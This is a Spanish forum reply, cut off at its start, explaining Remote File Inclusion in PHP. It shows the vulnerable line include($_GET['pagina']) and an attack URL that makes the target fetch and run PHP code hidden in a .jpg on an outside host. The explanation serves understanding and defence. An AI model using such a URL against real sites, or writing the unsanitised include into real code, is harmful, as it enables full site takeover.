Bueno realmente no te podrian h

Lo que comenta wrkjmg, es un RFI (Remote file inclusion).

Es cierto que algunas páginas hacen algo como:
llamada a la página: index.php?pagina=principal.php

y despues el include lo hacen así:
include($_GET['pagina']);

en este caso, si nosotros metemos en el url lo siguiente:

index.php?pagina=http://www.midominio.com/script.php

veremos que se incluye el resultado html de script.php en la página. Que es lo que comenta wrkjmg. Lo gracioso es que sólo incluirá el resultado html, ya que el codigo php se ejecuta en nuestro servidor (www.midominio.com).
Por lo que por ello no hay problema.

El problema es que el usuario también pudiera elegir la extensión, es decir, como ya sabemos, el cliente (usuario), de un .php sólo recibe el resultado html, nunca el código php. Pero si en vez de un .php usamos ese mismo código php en una imagen .jpg o .gif, esta vez el codigo sí saldrá del servidor y se ejecutará en el servidor atacado.

si puedes hacer algo como:
index.php?pagina=http://www.midominio.com/script.jpg

entonces tienen tu site entero en sus manos.

en este caso como se incluye un .php al final:
include ($_GET['pagina'] . ".php") No podrían hacer el RFI, pero aun así podrían jugar con los archivos php de nuestro server.